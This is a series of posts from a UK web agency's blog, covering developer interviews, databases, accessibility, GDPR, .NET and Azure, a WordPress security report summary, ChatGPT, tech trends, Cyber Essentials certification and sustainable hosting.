“When code is able to drive tech to achieve something, to make people’s lives a little bit better, that’s when the magic happens”- Moz
National Coding Week runs from 18 – 25 September, with the aim to inspire children and adults into careers in technology. In support of this, we sat down with our developers to find out what made them start coding and why they still love it…
“There is always a new puzzle to solve.”
My journey into programming was sparked by an early fascination with computers. Some of my earliest memories involve my dad teaching me how to set up and play games on our ageing Commodore 64.
We decided to start a family business creating websites. I initially took on the hardware and support aspects, but as time went on, I started delving into the intricacies of software and how websites functioned, and started learning PHP, MySQL, and Linux. I have continued to work with these skills throughout my career in programming.
The day to day work is generally interesting, there is always a new puzzle to solve and with that comes a great sense of satisfaction when elegantly solving a challenging problem.
My favourite project I’ve worked on was IFLScience, mostly because of its scale and the challenges/solutions that come along with that. (I had nothing to do with the current site, all the parts I worked on have been relegated to history).
My favourite Infotex project would probably have to be the Children’s Commissioner site; it had some interesting challenges and was overall a fun project.
We used a tool called the WordPress Page Builder to help us make the website. It’s like building with colourful blocks, and it’s fun!
“Pragmatic use of tech driven by code can help to progress a career.”
I’ve had an interest since the 1990’s (before we had graphical interfaces), that started out as batch files and quickly turned into QBasic. At secondary school I unknowingly took the next step when I created a Visual Basic for DOS (disk operating system) maths educational program to fill a need for one of our teachers, who went on to use it more widely, to the annoyance of the IT department.
For me programming is a means to an end: when code is able to drive tech to achieve something, to make people’s lives a little bit better, that’s when the magic happens. At work that might be the ability for code to analyse a body of data that humans couldn’t practically do, or for a business to succeed in ways it otherwise couldn’t.
Outside of work I’ve long been fascinated by the interconnection between code and the real-world. Things like Raspberry Pi’s or Arduino’s that allow relatively small amounts of code to either control or monitor physical real-world items are a particular favourite of mine.
I used code to take thousands of news stories and changed them to work on a different system to help keep a little bit of car history alive.
I’d look at it the other way: that pragmatic use of tech driven by code can help to progress a career.
The fact that things like Amazon’s solutions allow us to write just a few lines of code to create, and modify, entire virtual worlds is very powerful. It’s starting to become possible within the SME arena to couple things like this to some of the relatively large, even real-time, data processing systems. One can imagine some very cool solutions just over the horizon, allowing a few lines of code to determine how a structure should dynamically handle some event, that could, for example, allow a system to scale resources down to avoid wasting energy at quiet times, or could respond to a high load attack by filtering traffic and/or increasing capacity.
“I can’t choose a favourite project, it would be like picking a favourite child!”
I was working in a company that made paint colour cards and various promotional materials and the production manager and I spent a lot of our time programming in Excel to handle customer stocks. I realised I preferred that to the rest of my job, so I left to do a MSc in Advanced IT, specialising in software development.
I love the problem solving aspect of programming, I still get a buzz when I figure out a way of doing something that’s been puzzling me for a while.
I can’t choose a favourite project, it would be like picking a favourite child!
I’m working on an App that will help to make it easier for people to learn about forests and have fun outdoors.
“That moment at the start of a programming project when there are so many possibilities is still very exciting”
When I was a kid, we had an Intel 8088 machine which I used to write simple text adventures in GW Basic. It was a relatively simple programming language that taught me the basics of variable assignments and looping. I think we are missing something simple like GW Basic in today’s early learning.
Creating an empty folder and then structuring and writing files and code to produce something that people can interact with. That moment at the start of a programming project when there are so many possibilities is still very exciting.
I’m currently experimenting with ways to talk to a computer in English so that it can do complicated things for me in a program I’ve written.
There are always new and interesting things to play with in development so it’s easy to find lots to be excited by.
I have a 4 year old and I’m looking forward to seeing how he interacts with computers. I hope that the modern curriculum places a greater emphasis on interacting with, and particularly programming, computers.
Outside of that I’m very interested in AI and how I can use it in my programming.
“I enjoy seeing the end product and how it helps people out, making their lives easier”
By accident. I had a degree in Economics, but didn’t want to go into finance. I took a business NVQ while looking for a job, and ended up helping the other students with the computer parts of the course. This led to a job in IT training, which was short lived, then to a job in software support, which slowly introduced software development.
When it goes well, I enjoy seeing the end product and how it helps people out – making their lives easier.
An application that is for the running of woodland courses, that allows users to register their interest in a course and then say how they feel each day of the course.
“I’m excited about seeing how AI will provide an opportunity to transform the way coding is carried out”
My first experience with coding was as a child running simple commands using BASIC on my dad’s ZX Spectrum. As there were no formal coding lessons at school, it was not until university that I had the opportunity to explore programming in greater detail. It was there I started using FORTRAN to simulate Physics experiments and this was the point at which I developed a passion for coding. I much preferred this to the time consuming setup and repeat of experiments with physical equipment.
I enjoy the sense of achievement once something is working as it should, and the ability to connect different systems to allow them to communicate with one another.
I have been working on a website which shows different items which can be bought from the website’s business.
I wrote a list of instructions which is called code. When a person visits the website the code that I have written will show the words in different sizes and using different colours. This code allows the people to view the website on a phone, tablet or computer and to have a clear layout on any device.
This coding also allowed information to be taken from the old website to the new one.
I’m excited about seeing how AI will provide an opportunity to transform the way coding is carried out with the potential to aid debugging of issues and testing.
Read more about National Coding Week and see how you can get involved.
Often we’ll hear people describe their Excel spreadsheets as ‘databases’. Whilst an Excel spreadsheet can contain a treasure trove of vital information for a business, it isn’t, strictly speaking, a database.
As a system developer when someone says ‘databases’ to me, I think of them as a tool to organise data in a structured way that can protect it from inadvertent updates and deletions and make the data in it available to the right people in the right place at the right time.
A relational database allows data to be stored in one place but referenced in many others. As a simple example, there can be a list of customers in one table, and can then link one of those customers to a table of orders, and also to a table containing a contact history with that customer, so if we need to update anything for a customer we update it once and everything related will see that update.
Almost all the systems I work with are built using Microsoft SQL Server as a database (Gareth works in our Systems team, dealing with bespoke applications for the health sector). I’ve been working with SQL Server (pronounced ‘sequel’) since the year 2000. In those days I was taken into a freezing cold air-conditioned server room and told that the big box in the corner, which looked like a larger version of the PC on my desk albeit with a built-in tape deck for backup purposes, was the SQL Server. Even back then, we’d rarely interact physically with the machine itself, instead using tools on our own computers that could connect to it to get data from it or to write programs that inserted and worked with the data on it.
I learnt about how you could take backups of the data in your database as frequently as you wanted, and about a thing called a ‘transaction log’ which recorded everything that was updated in the database. You could even use it to almost go back in time to see what the database looked like prior to a change. I also learned that SQL Server could use things called indexes, a subset of your data that could be used to show things on screen or in reports much more quickly than you could do it if you were getting all of the data.
The systems we were building became more and more complicated and as they contained health related data we learnt how to encrypt data within the database so it was only accessible to people with the correct permissions level. With hundreds of users accessing data at the same time, all wanting instant responses we identified ways of getting data out of SQL Server as quickly as possible.
Nowadays there are many different ways of using SQL Server. Dedicated physical servers are less common with the flexibility offered by virtual servers and even cloud based servers meaning it is possible to have SQL Servers in different locations, even different continents, that synchronise data between them, making globally connected systems easy to implement. Microsoft’s Azure services involve a product called SQL Database with the ability to scale up the processing power available to it as a system grows. Microsoft take care of managing the availability of the database, and as developers we can concentrate on getting your system running as fast as possible.
So if you’re using Excel as a database or have spreadsheets that are becoming unmanageable, get in touch and we’ll help you to secure that important business data.
Put simply, web accessibility means ensuring that websites or mobile apps are usable by as many people as possible. This includes those with vision or hearing impairments, motor difficulties, and cognitive impairments or learning disabilities.
Accessibility also refers to making websites and apps usable for people with more situational limitations, such as people using mobile phones, older people, people in locations where they cannot play sound, people with ‘temporary disabilities’ such as injuries or lost glasses, or people with socio-economic limitations such as slow Internet connection.
Accessibility is important for ensuring that everyone has equal access to information online. It aims to remove barriers for users with disabilities and impairments who might otherwise struggle to access online content. Around twenty percent of the UK population have a long term illness, impairment or disability.
Accessibility is particularly important for public sector websites and apps, because they often provide essential services that everyone must be able to access.
On top of this, making your website or app accessible is beneficial to every user. Accessible websites are often faster, clearer, have better user journeys, and could rank higher on search engine results.
All public sector bodies have to meet the accessibility regulations that came into force in 2018, unless they are exempt or partially exempt (such as schools).
These requirements outline the need for websites and apps to be ‘perceivable, operable, understandable, and robust’ for as many people as possible.
Non-public sector organisations and businesses are not required by law to reach these same accessibility standards for their websites. However, there are numerous benefits of making websites as accessible as possible:
There are many ways to make your website accessible, some are more simple than others.
For a thorough look at what can be done, designers and developers refer to the Web Content Accessibility Guidelines (WCAG). It is usually more effective to incorporate accessibility from the start of a project, rather than returning to re-do work.
If these guidelines seem a lot to take in… hear from one of our designers, Alice, for simple ways to make your website accessible.
Got questions about the accessibility of your website or app? Don’t hesitate to get in touch.
Our recent launch of the new website for the Children’s Commissioner had to meet the WCAG AA Standard. The website audience is diverse, aimed at children and young people as well as teachers, parents and the media. Combining three priority areas identified by the Commissioner into one comprehensive website, it was vital that all of the detailed reports, articles and publications are easy to read and view across multiple devices, platforms and screen readers.
We worked with Suffolk County Council to create a new website promoting Suffolk as the ‘Greenest County’. With a wealth of content (totaling over 300 pages), the website needed to meet accessibility guidelines to ensure that everyone is able to read about their inspirational work. Check out their website: greensuffolk.org
Greenpixie provides cloud emissions data to help companies take control of their carbon footprint, reduce spending, and lower their emissions.
We spoke to the CEO of the company, former Infotex employee John Ridd, to find out a bit more about his journey, cloud computing emissions, and Greenpixie’s mission to help reduce them.
It would have been about two years ago from ideation when me and my co-founder, Will, CTO of the company, had the idea during a hackathon. We had heard about digital emissions making up over 2% of global emissions, which was more than that of the entire aviation industry.
We felt that there was a real business opportunity to quantify this issue and perhaps reduce it using the scalability of digital and the availability of data for this particular sustainability issue.
We created an MVP (Minimum Viable Product) and first focused on websites: we came up with a way to quickly estimate the emissions of our website homepage, which we sent out via email marketing and got a lot of responses – we thought, we’re onto something here! That started our journey into digital sustainability. It just so happened we didn’t end up doing websites, but cloud computing emissions, however the principles that we started with remained the same: a scalable way to measure and reduce digital emissions.
By 2030, digital emissions are predicted to be over 10% of global emissions due to continuing demand for data. A large amount of these digital emissions is cloud computing, but also the internet itself; Chat GPT, streaming services – it all ends up with data centres, which suck up an incredible amount of electricity. A lot of metals and rare minerals are used to create all this hardware server equipment and continually replenish it – I think the average lifespan of a server in a data centre for cloud computing is only about four years. A recent Telegraph article refers to data centres outside of London as ‘energy vampires’ because of their electricity usage impacting residential build plans.
It’s a combination of those two things, the huge amount of electricity used, and the materials and minerals needed. There’s also a third dimension, which is water usage. Data centres take in a colossal amount of water in order to keep things cooled. One example is a data centre in Nevada, which was recently covered in BBC’s Panorama programme a couple of months ago, Is the Cloud Killing the Planet?, which used one billion litres of water a year.
That gives you an idea of how our digital world and cloud computing actually causes a very big sustainability issue.
This problem is really a business and enterprise problem. It’s not going to change from us at home not watching Netflix so much, or reducing our own digital emissions, because that’s a drop in the ocean compared to where the problem lies, which is with businesses and enterprise. So we focus on cloud computing.
Software engineers in companies essentially rent servers from data centres owned by Amazon, Google and Microsoft, such as Microsoft Azure or AWS. Hundreds or even thousands of tons of emissions are created from renting all these servers. Currently, there’s no real way for companies to have reliable cloud computing emissions data. This is due to cloud providers not being transparent enough to ultimately provide this information in a way that is really compliant with regulation due to multi-cloud setups within companies.
Secondly, the big factor, which we focus on, is there’s a large amount of cloud waste in the way that enterprises utilise the cloud. Software engineers over purchase server space when they are building out the tech corporations for companies. This means that 30% of servers that are being turned on, left on and used, don’t need to be. So there’s 30% more emissions which also correlates with a 30% overspend, and the companies are paying.
What GreenPixie does is provide companies with the data needed to comply to the latest regulations. One of the big ones is CSDR coming through the EU, which makes companies responsible for their cloud computing emissions, and falls under Scope 3 (the supply chain) in the ESG framework. Secondly, we enable software engineers to reduce emissions at source: we quantify the emissions that are being wasted and then they can clean up the waste through the way that they’re building out their tech, saving money as they do that.
I would say when it comes to digital emissions, they’re very actionable and very measurable when the right tools are out there. I’m actually very optimistic that we can reduce this ‘10% or more’ figure by 2030.
The truth is doing it for the good of the planet normally doesn’t fly when it comes to business priorities, because everyone has so many other priorities. Leadership teams in companies often need to have successful sustainability initiatives of reducing at source so there needs to be cost incentives, which we provide. We’re optimistic in our own focus that this is going to be adopted and there are going to be a lot of emissions prevented.
As a wider sustainability lens, there’s been a move away from offsetting, because really what that is in practice is companies outsourcing their responsibility. There’s been some high profile greenwashing legislation coming through, which it’s going to stop companies getting away with that. As long as companies are clever in trying to incentivize the enterprises to reduce their emissions, we can get there. Cloud is a really good example of that, I think.
We covered cloud emissions at COP 27 for the first time. And we have a really amazing advisory board that opens up opportunities like this.
There is responsibility when it comes to putting out the best information, but there’s a real network of businesses in industry sustainability at this point. So there’s institutions, such as the SDIA (Sustainable Digital Infrastructure Alliance) who are focusing a lot on the science behind this. There is also open source tooling, Cloud Carbon Footprint, which we’ve built upon and improved to be able to give emissions data. We’re connected into all the information to allow us to be leaders in this space. It’s also become more mainstream now, on BBC One a couple of months ago cloud computing emissions were covered as a top level issue.
There is awareness now, but we were one of the first to build a business around this.
We’re fundraising in order to bring this to market in a very big way, and we’ve already got this data product that brings transparency over the issue and allows software engineers to start acting on it.
So really we want to go down the route of growing out the team. We’ve got six full time currently, but we want to get a lot bigger than that now we’ve brought a product to scale. So hopefully we can be servicing hundreds of company’s cloud emissions in the near future, making enough revenue ourselves and ride the wave of what we’ve built.
Yeah, I have a lot to be thankful for for my time at Infotex. I actually did an interview fairly recently and I spoke about Infotex and about Tim Webster (My First Boss).
Infotex is a very giving company that enables companies like Greenpixie to emerge because of people like Tim. Infotex is generally very generous with their time and has this tech mindset that allows companies like this to be built.
The General Data Protection Regulation came into effect on 25th May 2018. Its goal is to protect the rights of individuals where personal data is being used. It does this by outlining the rights of individuals, requiring a lawful basis for the processing of personal data, and placing expectations on how personal data is managed.
In practice, it can be time-consuming and difficult to adhere to GDPR and it is not always clear how specific scenarios should be interpreted. This sometimes creates a laissez-faire attitude towards it where it can be treated as a box-ticking exercise.
At its heart though GDPR, when implemented correctly, benefits us all. Fundamentally it is about understanding the breadth of the personal data that you are capturing and reviewing its journey from the individual through your business-controlled systems and processes and oftentimes its onward journey to third parties.
Without this process, it’s very easy to fall into a situation where you are capturing personal data without even realising it. Keep in mind that GDPR takes a fairly broad approach to what constitutes personal data (including IP addresses and cookies where they can be utilised to identify an individual). Producing a modern website is complex and this complexity increases all the time. Whilst sometimes functionality is programmed from scratch for a specific website, there are also numerous choices when determining which 3rd party services to utilise or integrate with. Take something simple like an integration with a page-sharing service. Perhaps it utilises some embeddable code to render the icons and facilitate sharing. Innocent enough on the surface but is the script capturing any data? Is any of the data personal? Where is it sent? What happens to that data? How do we request its access/deletion?
Another common example is a contact form to capture a simple message (perhaps a name, contact number, and message). This seems relatively straightforward but there are a number of questions we should be asking such as, do we need all of that data? Where is the message being sent? Is it stored anywhere? Does it get sent via email to an email client? Is that being downloaded and stored? Is it passed on to other departments within your company or travel onward to other 3rd party systems? Would you be able to recover/delete that data if requested?
It’s important to state that GDPR does not stop you from doing these things. It asks you to consider whether you need to do them and, if you do, that you do so responsibly and transparently without infringing on the rights of individuals.
From a business perspective, there is great value in understanding your data:
We owe it to ourselves to carefully consider how we capture, process, and share personal data. We shouldn’t just implement a new service, integration, or tool without first looking at it through a data protection lens. A useful exercise is to consider whether you would be comfortable with your own personal data being processed in that way.
As a final thought, we are entering a world where AI is going to be a part of our everyday lives. AI systems require input in order to respond (either in the form of a question or, as another example, the context around something being analysed such as a piece of code). This input has the very real possibility to contain personal or sensitive data. Where does that personal data go? Who is it shared with? Can it easily be recalled/deleted? These questions do not have easy answers and it remains to be seen how AI will be regulated to provide the same protections currently offered by GDPR.
If you need help understanding your data please get in touch.
For those of us who live in the Microsoft world, .NET has been revolutionary over the last 20 years.
It enables developers to collaborate easily and write, test and fix code efficiently, as well as supporting builds for a range of different applications, including desktop apps, mobile apps, and website apps.
Our .NET applications are developed to sit behind the websites, processing data, integrating with other platforms and providing back office user functionality that is so important to make websites work effectively on the front end.
Microsoft .NET is an open source developer platform that assists the creation of various types of applications.
.NET has two main different versions:
.NET Framework is the original version that Microsoft introduced back in 2002. It was a replacement for Visual Basic, which was used by many developers to build applications for Windows. Around this time was when Internet technology was really taking off, with many organisations building not only websites but Intranets as well.
Alongside .NET, Microsoft also introduced Visual Studio .NET, which was an Integrated Development Environment (IDE). This enabled developers to develop software code, build this code, and ultimately run it on their computers to debug before putting it live. This IDE software is updated every couple of years.
The last version of .NET Framework 4.8 was released in April 2019, with an updated security version 4.8.1 in August 2022.
Microsoft has now retired the .NET Framework and moved across to what was known as .NET Core before this became .NET 5 in November 2020. Through this cross-platform version, Microsoft has expanded its platform to support .NET developers looking to leverage other platforms, and to attract customers looking to build apps with other tools including Node, PHP, and Java.
As with most things Microsoft, there are continual improvements and new versions being released each year. .NET 7 was released in November 2022 with .NET 8 due to release in November 2023.
What this means for us, as developers, is there is a continuous learning process to keep up to date and keep our software as up to date as possible, as unfortunately Microsoft doesn’t support their .NET versions for very long. .NET 7 will stop being supported in May 2024.
For our customers, it means that we have to focus on keeping applications up to date, and occasionally having to rewrite these from scratch to be able to utilise new functionality and keep applications secure.
Microsoft Azure is a cloud computing platform which launched in February 2010. It is a collection of integrated services for building, deploying and hosting applications and services through a global network of Microsoft managed data centres.
The idea behind cloud computing is that it stops organisations having to have their own data centres or collection of physical servers, which both need to be managed and are very energy inefficient. For example, data centres have to be air conditioned so that the servers don’t overheat.
It is the large-scale equivalent of your Google Drive or Microsoft OneDrive, which stores your files on big servers that you access via an internet connection, instead of on your own computer’s hard drive.
Cloud software runs on a remote server belonging to the company who makes or operates that software, and when you want to use it you access your account online.
During the 1980s – 2000s, Microsoft’s Windows system was the go-to operating system, enabling home PC users and businesses alike to interact with their computers. But with the cloud computing revolution of the late 2000s, competitors like Amazon Web Services (launched in 2006) introduced online services for developers to make new websites and complex applications from one basic framework.
To prevent being left behind, Microsoft launched Azure, a cloud platform for .NET and other developers to interact with. Microsoft has now opened up the Azure environment, adding support for non-Microsoft technologies in order to widen its appeal to all kinds of developers. Microsoft has also built a large number of technologies specifically for the Azure platform.
Compared to on-premises and some traditional hosting providers, Microsoft Azure can help increase efficiency and reduce costs. It is reliable, offering platform uptime guarantees of 99.95% and can be coupled with multi-region failover to further increase reliability.
Microsoft Azure offers a variety of services, including virtual machines, databases, storage, networking, analytics, artificial intelligence & Internet of Things (IoT). Infotex use many of the Azure services as part of our technical toolkit. For example, “WebApps” is used to power some of our web applications coupled to Azure’s cloud based SQL Server database.
If you would like to discuss what would be most suitable for your needs, speak to one of our experts today .
We talk about security a lot in the articles, but we talk about it even more internally as it’s vital we maintain safe and secure sites for our clients.
The threat intelligence team at WordPress security experts Wordfence have recently released their annual report on the state of WordPress’ security. As hosts of many WordPress sites we have to understand the ever changing landscape in which these sites exist so we can combat likely intrusion points..
The key take-aways from this year’s report were:
That sounds bad – more vulnerabilities means more problems? Not quite. There has been an increase in companies who are CVE Numbering Authorities. CVE stands for “common vulnerabilities and exposures”, and is a publicly available catalogue of known security flaws. Historically many WordPress issues were not reported but because of the increase in the number and openness of these authorities, it’s made it much simpler for people to officially disclose security problems.
As WordPress, and the majority of its plugins, are built within the open source ecosystem, anyone can download the code and analyse it. The more people who are looking, the more issues the more are likely to be found. Finding and reporting such issues is increasingly becoming a full-time (paid) occupation for many developers who are then paid through the “bug bounty” programs. These ensure that the bugs don’t end up in the hands of malicious entities therefore these being responsibility reported helps everyone within the ecosystem.
Out of the vulnerabilities reported the most common issue was Cross-Site Scripting (XSS), with over 1,100 reports in 2022 alone this accounted for nearly half of all vulnerabilities disclosed. Cross-Site Scripting attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. More than a third of the XSS issues required administrative permissions on the website itself in order to be successful, so the risk was greatly reduced. This does highlight why users should only be provided with the minimum level of access they absolutely need, WordPress has a strong permissions architecture with varying roles with Contributor, Author, Editor, Shop Manager and Administrator being the most common each with different abilities.
Despite the number of reported XSS vulnerabilities there were around 3 times as many SQL injection attacks as there were XSS. A SQL injection attack is when an attacker tries to run database commands through a website which has not taken care to sanitise what people are entering into forms etc. There was also a comparable number of malicious file upload or inclusion attacks, these might be where someone gains access to the administration area and uploads a script to gain them further access rather than the intended image or text.
There are more and more leaked password lists available online as more data breaches occur. Credential stuffing is where hackers are utilising usernames and passwords taken from these lists to try and log in to the admin area of your site. When directories like HaveIBeenPwned (enter your email to see what leaks your info has been a part of) over 12 billion compromised sets of credentials it is no wonder that Wordfence collectively blocked over 159 billion login attempts in 2022. Surprisingly, this is actually a slight decrease on 2021.
To keep your site safe please don’t use your WordPress login details on any other site, and make sure that when you create the password it is rated as Strong. These are good principals to apply to any site, and combining it with multi-factor authentication wherever it’s available will make it even more secure.
It has always been important to make sure that the core WordPress code, its plugins, and themes are kept up to date with the latest patches and it is no less true now. It’s obviously good practice for keeping your site secure, but also for extending its overall lifespan. Trying to upgrade very out of date plugins or WordPress code is very time consuming.
WordFence saw that most attacks targeting specific vulnerabilities were via known, and easily exploitable, flaws in this code on sites that had not received any recent updates. Infotex will take care of your site and make sure that it’s got the latest patches to keep things running smoothly. Indeed Wordfence stated “As such, the greatest threat to WordPress security in 2022 was neglect in all its forms“.
The second largest category of attacks was from known malicious “User Agents”. A “User Agent” is the formal term for a browser but also encompasses many other ways in which website content is processed. From Infotex’s own data around 60% of all requests are typically non-human in nature.
In addition to the more legitimate search engine robots (aka “bots”), many of these requests are from bot’s that have no purpose on a site or system other than to attack it.
A common task for these bots is looking for webshells – this is where an attacker has gained a foothold within a website and is intended to allow them to retain control and request the server to act on the attackers behalf, it’s commonplace for attackers to compete for access to webshells as nefarious access to one can cause huge problems for the site’s owner. Wordfence saw over 23 billion attacks of this type in 2022 across the 4 million+ sites they protect.
The full report is available to download via Wordfence.com
There has been a lot of noise in the media over the last month over the rapid rise of AI tools such as ChatGPT, Google Bard, and Microsoft Bing’s AI enhanced search. AI is nothing new, but ChatGPT reached 1 million users in less than a week and 100 million in under two months.
Basically it’s a chatbot. The tool lets you provide a natural-language prompt or question, and then ChatGPT responds back in natural-sounding language. The bot will use the previous questions / prompts to assist in responding to future questions on the same thread. Surprisingly (or perhaps to avoid the SkyNet of Terminator films), the bot doesn’t use the internet for its response – it’s solely based on the huge data set it has been trained on.
You can request it to answer questions or be creative by writing a poem on a specific topic. Many are using it to write covering letters for job applications, solve maths problems with a step-by-step breakdown of the answer, and write code that goes into websites.
At Infotex we polled the team as to how they’d been using it. So far they have:
ChatGPT isn’t foolproof though, and even ChatGPT’s owners OpenAI note “It’s a mistake to be relying on it for anything important right now. We have lots of work to do on robustness and truthfulness.”
ChatGPT’s rapid rise has prompted Google to expedite their new AI-powered search feature ‘Bard’. This uses natural language processing and machine learning to provide more relevant and insightful information to users.
I don’t expect it to replace the traditional ‘10 blue link results’ in Google but do expect the top section of the results pages to begin including AI-generated responses and answers to questions/queries.
This could be game-changing for search in many ways:
One downside of these generated answers would be fewer clicks on the organic results, which would be frustrating for website owners looking for traffic. As it’s Google, I’d expect to see them protecting their more commercial search terms which would currently be occupied by paid ads. It wouldn’t be too difficult to keep commercial queries (“car insurance”) and general questions (“what is Newton’s third law”) separate.
At the same time, Microsoft is also adding AI-generated answers to its Bing search results. Again, adding AI-generated responses to the search page results.
These are just a few examples of the many applications and uses of ChatGPT. Its versatility and ability to understand and generate human-like responses make it a valuable tool for a wide range of industries and use cases.
Everyone has their own idea of what the future will look like… but in the fast-moving digital world, the future is never far away. We’ve asked some of our team what their predictions are for the coming year. Do you agree?
The word ‘metaverse’ was runner up for the Oxford University Press Word of the Year 2022 – a telling sign of the growing conversation around a future where digital and physical worlds merge. Contributing to this future is the growing traction of Augmented Reality (AR), a type of Extended Reality (XR) that is on the rise along with Virtual Reality (VR) and others.
Note, for instance, the new World Cup FIFA+ Stadium Experience, an augmented reality overlay that allows stadium audiences to view stats, heatmaps, insights, and VAR replays on their phones while they watch the match live. This is just one of many examples of AR, a technology that brings together digital data and the physical world and is predicted to reach a global market of $50 billion by 2024. While technology is usually implemented on mobile apps – such as Amazon’s View in Your Room feature or the Ikea Place app – it is starting to be implemented on websites too, such as knitted tie store Broni and Bo’s virtual try on. AR might prove to be particularly beneficial to business owners from sectors such as beauty, manufacturing and tourism.
Amidst the online constant buzz of activity, brands and platforms alike are battling to create meaningful and memorable user experiences. Motion is one of the ways that your brand’s website can stand out and hold on to user attention. Implemented well, a user experience including motion can communicate a story, sequence, or transition more effectively than one without.
Interfaces that include motion do not have to rely on plugins but can be integrated through development frameworks. Enhancing your website and brand through Motion UI doesn’t have to mean animation or videos – additions as simple as the motion micro-interactions that occur when a user hovers over an action point or clicks a transition button can make the difference between a static website and one that ignites a user’s interest. Take a look at the Motion UI on our own website, for example.
As the internet grows and changes, the popularity of voice search continues to rise through Amazon Alexa style devices and “Hey Siri” requests. And, with the increasing popularity of Internet of Things (IoT) devices, such as smart speakers, this trend doesn’t show any signs of decline. This is not a trend to ignore: optimising your business for voice search will help with every aspect of your overall SEO. Click here to find out more about what steps to take for voice search optimisation.
You may not realise, but many websites that you visit are actually using PWA technologies to provide an experience closer to that of native applications. You can see this when you visit sites like Twitter, Gmail, etc.
Progressive web apps are essentially web applications that feel and function like a native mobile application. This means they increase the quality of user-experience by offering advantages such as offline use, hardware access, push notifications, and the ability to be “installed” on the user’s device. While these clever web apps have been on the increase for a while, their popularity shows no sign of slowing down. Click here to read more about progressive web apps.
Single Page Applications (SPAs) are a key cause of our constant scrolling habits. SPAs work inside a browser to offer seamless user-experience by dynamically loading as a single page. This way the user does not have to wait for the site to continually reload, and can enjoy uninterrupted scrolling. They can offer better page performance, data protection, and work efficiently if the user has poor internet connection, as the content loads completely at the first sign of communication with the server.
Single-page websites (SPWs) work in much the same way. Website content, such as that which might otherwise be found under a “Work” or “About” tab, is fully loaded on the initial page and can be navigated by links within the one page. These intuitive and well-structured single-page websites increase the likelihood of maintaining the attention of users, and enable control of the order in which information is absorbed. Compared to multi-page sites, the site design and development requires less time and money and is more suited to optimisation for mobile devices.
Smart Content refers to the dynamic elements of your website that change depending on the site user profile. It targets individual customers with a personalised experience, and also decreases site loading times to drive significantly higher conversion rates and ROI. Read more about Smart content loading in our blog.
The green transition is here, and, with the internet as a major producer of carbon emissions, web developers have an important role to play. From sustainable web design, to efficient web development, to green hosting, there are many things website creators can and should be doing where possible. As awareness grows about the need for online business that cares for people and planet, and creative solutions increase, we expect sustainable web development practices to continue to grow.
One of the less sexy elements, but for any company that has ever experienced a cyber attack first-hand, online security has always been extremely important.
During 2022 we saw an increase in large-scale nation-state cyber-attacks, such as the Russian attacks against Ukraine and Montenegro and the unidentified attack on the New Zealand government. In 2023 businesses should expect attacks of this kind and scale to become more common and sophisticated. Some of the more pessimistic members of our team would not be surprised to a government body or key public services (or comparable body) is brought down due to a cyber attack.
These security concerns are not just reserved for large corporations. In 2022 research by the world economic forum found that 95% of cyber security issues were caused by human error or a lack of cyber security concerns. Website and Web applications process a lot of valuable data, and with more company assets moving to the cloud to accommodate hybrid/remote working, the potential damage caused by cyber-attacks has never been higher.
Many of the trends we see for 2023 are very similar to those we saw in 2022. Will 2023 be the year that web3 finally kicks off? or the year that there is a considerable push on hardware that supports ARs, making it an essential part of our daily lives? Only time will tell!
One thing is certain. However, companies that provide clients and customers with the best user experience will thrive in 2023. There is a lot of new exciting technology out there that is easy to get excited about, but there is no magic bean this year that will separate the pack. Companies that take the time to understand their customers and demographics and tailor their website and online marketing to utilise the above tools (motion UI, smart content, PWAs, AR etc) correctly will come out on top.
Digital security is a necessity in an age where attacks and data exfiltration are commonplace. Hosting and managing hundreds of websites and systems also means handling a lot of valuable information. Keeping that data safe is a responsibility we take very seriously.
Cyber Essentials Plus is a UK Government-backed scheme designed to demonstrate organisations’ resilience against cyber attack. It ensures our systems are up-to-date, secure and fit for purpose, meaning our clients can rest assured that they are working with a business that is confident in its digital security.
The standard Cyber Essentials certification covers these five main areas:
As part of the Plus version of the certification, Infotex underwent an independent external technical audit by URM Consulting, to ensure that necessary technical controls are in place for the security of our systems. A random sample of staff were selected to be audited – making sure their work environment is up to date and secured. Our in-house infrastructure team periodically review all devices, to ensure they are all configured correctly. By passing, we are proving our internal processes, policies and security controls are in line with National Cyber Security Centre (NCSC) standards
Having previously completed Cyber Essentials Plus, the biggest change for this year is that all cloud services admin accounts offering multi-factor authentication must now have that enabled. In fact Infotex have gone one further and enabled it on all cloud services where that is feasible. Alongside this, minimum password length has been increased for any accounts, something reflecting the increasingly hostile online environment where password cracking tech continues to improve. We have also now disabled that stalwart browser of the last two decades Internet Explorer on all our Windows devices to bring that chapter of the web to a close.
Much like a car MOT, Cyber Essentials Plus is the minimum that we work to. We go above and beyond this with regular reminders and training, both face-to-face and virtual being provided to all Infotex staff to keep security in mind with both our practices, device configurations and website development processes to make sure we are doing all we can to maintain our ongoing cyber security knowing that forms a part of our clients also.
If you are looking at your businesses cyber security then undertaking Cyber Essentials Plus is something that we’d thoroughly recommend. It is a way to focus the company on the aspects which will give you the greatest security benefit against the attacks which are ongoing in the real world as the NCSC evolves the standard every year based upon the attack data that they witness in the real world.
Last Updated July 2023
It is estimated that data centres contribute 2% of all global greenhouse gas emissions – a figure that is rising as digital demand increases. However, by utilising cloud-based services for our hosting we are sharing resources and facilities, which reduces the number of duplicate, energy-hungry single-use servers.
We are conscious that site hosting will have an impact on Infotex’s carbon footprint. Because of this we are always looking to make sure our technical partners have, or are, taking steps towards sustainability. Our monitoring systems also help us to ensure that we are using these resources efficiently.
For the hosting of our primary websites and systems we use three main providers: Rackspace, Amazon Web Services (AWS) and ionmart.
Rackspace’s approach to the environment is straight-forward: they aspire to give back more than they take from the planet.
In 2019, Rackspace reviewed its energy strategy and opted to focus resources and efforts on energy reduction instead of purchasing carbon offsets.
Rackspace’s UK data centres LON3 and LON5 run on 100% renewable energy. Data centre LON8 does not, though Rackspace publishes an Environmental, Social and Governance Report (2021) showing steps they are taking to be net-zero across all sites by 2045.
Their commitment to a greener business isn’t just limited to energy. They have a host of creative ways to minimise waste in offices, such as composting coffee grounds and shipping pallets, refurbishing retired IT equipment for aftermarket use, collecting HVAC condensate to maintain landscaping and operate cooling towers.
As part of their route to net zero, they have been publishing a greenhouse gas emissions inventory every year since 2008, covering their global operations.
For further details visit Rackspace’s Corporate Responsibility section of their site.
Amazon Web Services (AWS) is targeting their global operations to be powered by renewable energy by 2025. The London and Ireland based AWS (where we host our sites and systems) are currently powered by 95% renewable energy.
In 2019 Amazon launched the UK’s largest wind Corporate Power Purchase Agreement, located in Kintyre Peninsula, Scotland. The new wind farm is expected to produce 168,000 MWh of clean energy annually – enough to power 46,000 UK homes every year.
